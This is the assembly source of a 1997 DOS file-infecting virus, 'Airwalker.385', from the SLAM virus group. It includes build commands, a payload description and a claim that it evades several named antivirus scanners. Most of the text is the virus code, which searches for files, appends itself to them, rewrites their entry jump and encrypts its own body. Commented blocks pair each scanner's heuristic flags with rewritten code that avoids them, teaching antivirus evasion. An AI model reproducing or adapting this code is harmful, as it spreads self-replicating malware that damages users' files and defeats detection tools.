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SLAM2.023: The Airwalker.385 Virus - Special SLAM Edition!
The Airwalker.385 Virus Written by Gothmog/[DHA97]
Assumes TASM v4.00 or v5.00 or A86 Macro Assembler v4.02; other assemblers may work, but are not personally tested or quality assured.
Assemble with: tasm /m2 airw-385.asm (/m1 generates a 386 byte variant)
tlink /t airw-385.obj
Alternately: a86 airw-385.asm (creates a 384 byte variant)
Payload: On each run, before returning control to the host program, the key contained at encrypt_key will be compared with a random byte taken from I/O port 40h (system timer). If the low bytes match, the host program will beep once, then continue normally. If the high bytes match, the virus will display its message from the SLAM virus team and transfer control to the host.
As of right now, the Airwalker.385 virus is 100% unscannable with:
- TBAV v7.07 w/ high heuristic sensitivity enabled
- F-PROT v2.26 w/ switches /ANALYSE /GURU /PARANOID enabled
- AVPLite v3.0 build 107 updated 03/22/97 with full heuristics enabled
- Dr. Solomon's FindVirus v7.69 w/ the following command-line switches
- Microsoft Anti-Virus (big surprise... no great accomplishment here :)
.model tiny
org 0100h
db 0E9h
dw offset virus_start - offset dummy_host
mov ah, 09h
int 21h
int 20h
message db 'WARNING: You have just released the Airwalker.385 virus!', 0Dh, 0Ah, '$'
db 0BDh
dw offset virus_start
; ===========================================================================
; F-Protect will flag this virus if the following code is included, but stops
; tracing immediately if a register is called, even if the /analyse /paranoid
; and /guru command-line switches are used.
; call decrypt
; ===========================================================================
lea ax, [bp + decrypt - virus_start]
call ax
; ===========================================================================
; AVP v3.0 build 107 update 03/22/97 will detect the following anti-heuristic
; code segment, but not if you xor a word on the stack:
; xor word ptr [bp + file_mask + 2 - virus_start], 1717h
; xor byte ptr [bp + file_mask + 4 - virus_start], 19h
; ===========================================================================
push word ptr [bp + file_mask + 2 - virus_start]
mov bx, sp
xor word ptr [bx], 1717h
pop word ptr [bp + file_mask + 2 - virus_start]
xor byte ptr [bp + file_mask + 4 - virus_start], 19h
; ===========================================================================
; O Found code that can be used to overwrite/move a program in memory.
; mov di, 0100h
; lea si, [bp + original - virus_start]
; ===========================================================================
mov si, 0100h
lea di, [bp + original - virus_start]
xchg si, di
mov ah, 1Ah
lea dx, [bp + virus_dta - virus_start]
int 21h
; ===========================================================================
; F Suspicious file access. Might be able to infect a file.
; mov ah, 4Eh
; lea dx, [bp + file_mask - virus_start]
; mov cx, 32
; int 21h
; ===========================================================================
mov bh, 4Eh
xchg ax, bx
lea dx, [bp + file_mask - virus_start]
mov cx, 32
int 21h
jnc open_again
mov ax, word ptr [bp + encrypt_key - virus_start]
xchg al, bl
in al, 40h
cmp al, ah
je payload_beep
cmp al, bl
jne back_to_entry
lea dx, [bp + slam_string - virus_start]
jmp display_string
lea dx, [bp + beep_string - virus_start]
mov ah, 09h
int 21h
; ===========================================================================
; B Back to entry point. Contains code to re-start the program after
; modifications at the entry-point are made. Very usual for viruses.
; mov si, 0100h
; push si
; ret
; ===========================================================================
dec sp
mov si, sp
mov word ptr [si], 0100h
xor ax, ax
xor bx, bx
xor cx, cx
xor bp, bp
xor si, si
xor di, di
mov ax, 3D02h
lea dx, [bp + name_buffer - virus_start]
int 21h
jc return_to_host
xchg bx, ax
mov ah, 3Fh
lea dx, [bp + original - virus_start]
mov cx, 03h
int 21h
jc return_to_host
push bx
mov bx, dx
cmp byte ptr [bx], 0E9h
pop bx
je find_next_file
mov ax, 4202h
xor cx, cx
int 21h
jc return_to_host
push ax
add ax, offset start
mov word ptr [bp + delta_offset - virus_start], ax
mov ah, 2Ch
int 21h
xchg ch, cl
add dx, cx
mov word ptr [bp + encrypt_key - virus_start], dx
xor word ptr [bp + file_mask + 2 - virus_start], 1717h
xor byte ptr [bp + file_mask + 4 - virus_start], 19h
mov ah, 40h
mov cx, virus_end - virus_start
lea dx, [bp + virus_start - virus_start]
jmp write_virus
pop ax
jc jump_up
sub ax, 03h
push bx
mov bx, bp
mov word ptr cs:[bx + 1], ax
mov byte ptr [bx], 0E9h
pop bx
mov ax, 4200h
xor cx, cx
int 21h
jc jump_up
; ===========================================================================
; F Suspicious file access. Might be able to infect a file.
; mov ah, 40h
; lea dx, [bp + virus_start - virus_start]
; mov cx, 03h
; int 21h
; jc return_to_host
; ===========================================================================
mov ax, 03h
mov ch, 40h
lea dx, [bp + virus_start - virus_start]
xchg ax, cx
int 21h
jc jump_up
mov ah, 3Eh
int 21h
jmp return_to_host
mov ah, 3Eh
int 21h
lea dx, [bp + file_mask - virus_start]
mov ah, 4Fh
int 21h
jc jump_up
jmp open_again
mov dx, offset message
virus_name db '[airwalker]', 00h
virus_author db '(c) 1997 gothmog', 00h
beep_string db 07h, '$'
slam_string db 'greetings to the world from the slam virus team', 0Dh, 0Ah, '$'
; ===========================================================================
; S Contains a routine to search for executable (.COM or .EXE) files.
; file_mask db '*.com', 00h
; ===========================================================================
file_mask db '*.txt', 00h
end_encrypt equ $ - 0001h
lea si, [bp + start_encrypt - virus_start]
mov di, si
mov cx, (end_encrypt - start_encrypt + 1) / 2
int 03h ; debugger trap
jnc false_jump
loop xor_loop
db 35h
encrypt_key dw 0000
jnc false_jump_2
call encrypt
int 21h
call decrypt
jmp out_write_virus
virus_dta db 30 dup (?)
name_buffer db 13 dup (?)
end start
; ============================================================[ code ends ]==